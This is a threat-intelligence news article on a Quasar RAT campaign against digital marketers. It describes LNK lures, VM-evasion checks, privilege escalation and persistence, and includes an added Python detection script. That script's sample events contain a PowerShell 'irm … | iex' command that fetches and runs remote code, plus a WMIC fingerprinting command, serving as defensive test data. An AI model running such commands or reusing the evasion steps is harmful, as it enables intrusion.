
Analyzing a Multi-Stage Malware Attack Targeting Digital Marketing Professionals

Recent research by the Cyble Research and Intelligence Lab (CRIL) has brought to light a sophisticated multi-stage malware attack orchestrated by a Vietnamese threat actor. This campaign specifically targets job seekers and digital marketing professionals, employing various advanced tactics including the use of Quasar RAT, which allows attackers full control over compromised systems.  

The attack appears to originate from spam emails that contain phishing attachments. These emails are designed to entice recipients into opening an archive file that houses an LNK file masquerading as a PDF document. The sequence of events begins with the execution of the LNK file, which carries PowerShell commands intended to download highly obfuscated scripts from external sources. This strategy aims to bypass traditional detection methods, particularly in non-virtualized environments.  

The Quasar RAT Campaign by Vietnamese Threat Actor

Once the environment is verified to be free from analysis tools, the attackers decrypt the payload using hardcoded keys. This step activates Quasar RAT, enabling the threat actors to gain extensive access to the infected systems, facilitating data exfiltration, and the potential deployment of additional malware.  

Execution flow of the campaign (Source: Cyble)

In July 2022, the Vietnamese threat actor intensified its operations by disseminating Ducktail malware specifically aimed at digital marketing professionals. The group later expanded its arsenal to include other types of malware, notably information stealers and remote access trojans (RATs). The attackers also leveraged Malware-as-a-Service (MaaS) frameworks to create more versatile and scalable campaigns.  

“This campaign is attributed to a Vietnamese threat group based on various indicators, including target selection, attack tools, and the delivery of malicious payloads,” noted CRIL. These elements align closely with tactics used in previous campaigns identified by cybersecurity experts, reinforcing the suspicion of organized cybercriminal activity.  

The Mechanics of the Attack

The initial phase of the malware attack involves a malicious LNK file that executes PowerShell commands to download an additional script hosted on Dropbox. The script at that link is fetched with the Invoke-RestMethod (irm) cmdlet and run directly through Invoke-Expression (IEX).  

Once the PowerShell script is executed, it decodes a lure PDF file and a batch file, storing them in the Downloads folder under the names “PositionApplied_VoyMedia.pdf” and “output.bat.” The script then triggers these files using the Start-Process command.  

The primary target of this sophisticated campaign appears to be professionals in the digital marketing, e-commerce, and performance marketing sectors, particularly those focused on Meta (Facebook, Instagram) advertising in the United States. The lure documents used in the attack have been crafted to appeal specifically to this demographic, increasing the likelihood of engagement.

Virtual Machine Evasion Techniques

One of the hallmark features of this multi-stage malware attack is its focus on evading detection by identifying whether it is operating within a virtual machine environment. The “output.bat” file employs Windows Management Instrumentation Command-line (WMIC) commands to ascertain the disk drive type and manufacturer, checking for signatures that indicate a virtual machine, such as “DADY HARDDISK” or manufacturers like “QEMU” and “VirtualBox.”  

If the environment is identified as virtual, the script exits to avoid detection. If not, it continues executing the obfuscated PowerShell script, effectively bypassing many security measures in place.  
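The first three stages described above (an LNK file that launches PowerShell with irm piped into IEX, a Start-Process of a dropped batch file from the Downloads folder, and a WMIC disk-drive query from that batch file) each leave a distinct process-creation event that a defender can match on. The following Python is an added example, not code from the article or from Cyble: it runs three such rules over a handful of constructed process-creation records shaped like a simplified Sysmon Event ID 1 export, and reports when more than one stage of the chain shows up on the same host. The Dropbox URL, usernames and file paths in the sample records are placeholders.

```python
import re
from typing import Dict, List, Set

# Constructed sample events (not real telemetry): parent image, child image,
# command line, as a simplified Sysmon Event ID 1 / process-creation export.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {  # stage 1: LNK opened from Explorer runs PowerShell that pulls a remote script
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'powershell.exe -w hidden -nop -c "irm https://www.dropbox.com/EXAMPLE/s2.txt?dl=1 | iex"',
    },
    {  # stage 2: downloaded script launches the dropped batch file from Downloads
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'powershell.exe -c "Start-Process C:\Users\user\Downloads\output.bat"',
    },
    {  # stage 3: batch file fingerprints the disk through WMIC before continuing
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\wbem\WMIC.exe",
        "cmdline": r"wmic diskdrive get model,manufacturer",
    },
    {  # benign administrative command, must not match any rule
        "parent": r"C:\Windows\System32\cmd.exe",
        "image": r"C:\Windows\System32\ipconfig.exe",
        "cmdline": r"ipconfig /all",
    },
]

# One regex per observable stage. All are case-insensitive because PowerShell
# aliases and switches are, and attackers mix case freely.
RULES: Dict[str, re.Pattern] = {
    # web fetch cmdlet/alias piped straight into Invoke-Expression
    "remote_script_execution": re.compile(
        r"(?:\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest).*\|\s*(?:\biex\b|invoke-expression)",
        re.IGNORECASE),
    # Start-Process of a script-type file sitting in a Downloads directory
    "download_dir_stage_launch": re.compile(
        r"start-process\b.*\\downloads\\[^\s'\"]+\.(?:bat|cmd|ps1|vbs|js)\b",
        re.IGNORECASE),
    # WMIC query of disk model/manufacturer, the VM fingerprint used by output.bat
    "wmic_disk_fingerprint": re.compile(
        r"\bwmic\b.*\bdiskdrive\b.*\bget\b.*\b(?:model|manufacturer)\b",
        re.IGNORECASE),
}


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event's command line matches.

    A remote-script hit gets an extra context tag when PowerShell was spawned
    directly by Explorer, which is what a double-clicked LNK looks like.
    """
    hits = [name for name, rx in RULES.items() if rx.search(event["cmdline"])]
    parent = event["parent"].lower()
    image = event["image"].lower()
    if ("remote_script_execution" in hits
            and parent.endswith("\\explorer.exe")
            and image.endswith("\\powershell.exe")):
        hits.append("explorer_spawned_powershell")
    return hits


def chain_stages(events: List[Dict[str, str]]) -> Set[str]:
    """Distinct chain stages seen across one host's events.

    Any single rule can fire on odd-but-legitimate activity; two or more
    distinct stages on the same host in a short window is the campaign signal.
    """
    return {h for e in events for h in classify(e) if h in RULES}


def triage(events: List[Dict[str, str]]) -> List[str]:
    """Human-readable summary lines, one per event that matched something."""
    lines = []
    for e in events:
        hits = classify(e)
        if hits:
            lines.append(f"{', '.join(hits)}: {e['cmdline']}")
    stages = chain_stages(events)
    if len(stages) >= 2:
        lines.append(f"multi-stage chain on host: {sorted(stages)}")
    return lines


if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The rules are deliberately narrow: each one keys on the command-line shape the article describes rather than on a domain or a file name, so they survive the attacker rotating the Dropbox link or renaming output.bat. The chain check is the part worth keeping: a single WMIC disk query is common in inventory scripts, but a WMIC disk query a few seconds after an Explorer-spawned PowerShell that piped a web fetch into IEX is this campaign.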

Decryption and Execution

The PowerShell script also includes a decryption phase where it extracts base64 encoded strings from the “output.bat” file. These strings undergo AES decryption using hardcoded keys, followed by decompression through a GZip stream. This process results in a .NET executable that runs in memory and conducts further detection-evasion checks.  

Advanced Checks for Virtual Environments

The malware employs an intricate series of checks to ascertain if it is running in a sandbox or virtual environment. These methods include:  

  • Checking for specific file names related to virtualization software like VMware and Parallels.
  • Inspecting the presence of particular DLL modules that are characteristic of sandboxing solutions.
  • Measuring time discrepancies in system tick counts to detect emulated environments.

If any of these checks indicate a virtual or sandboxed environment, the malware triggers an exception, halting further execution to avoid detection.  

Privilege Escalation and Persistence

Upon successful execution, the malware checks for administrative privileges. If the executable lacks these rights, it modifies its environment to gain elevated privileges using PowerShell commands or COM object invocations. Following privilege escalation, the malware copies itself to a hidden folder in the Windows directory and ensures it runs automatically on startup by modifying the Windows registry.  

Defense Evasion Strategies

The malware’s evasion techniques extend beyond initial execution. It modifies key Windows functions to disable event tracing, thereby obscuring its presence from security monitoring tools. The malware also encrypts and compresses sensitive data, including its payload, to further disguise its operations.  

Deployment of Quasar RAT

The final stage of the attack involves the execution of Quasar RAT, which has been adapted to reduce its detectability. This version of Quasar RAT is capable of executing a range of malicious tasks, including data theft and remote control of the infected system.  

Quasar RAT is configured with various parameters, including specific host addresses, startup keys, and log directories, which are all integral to its operation. The modification of its attributes helps in avoiding attribution and detection, allowing the Vietnamese threat group to operate with greater anonymity. 

Ashish Khaitan

Ashish is a technical writer at The Cyber Express. He adores writing about the latest technologies and covering the latest cybersecurity events. In his free time, he likes to play horror and open-world video games.
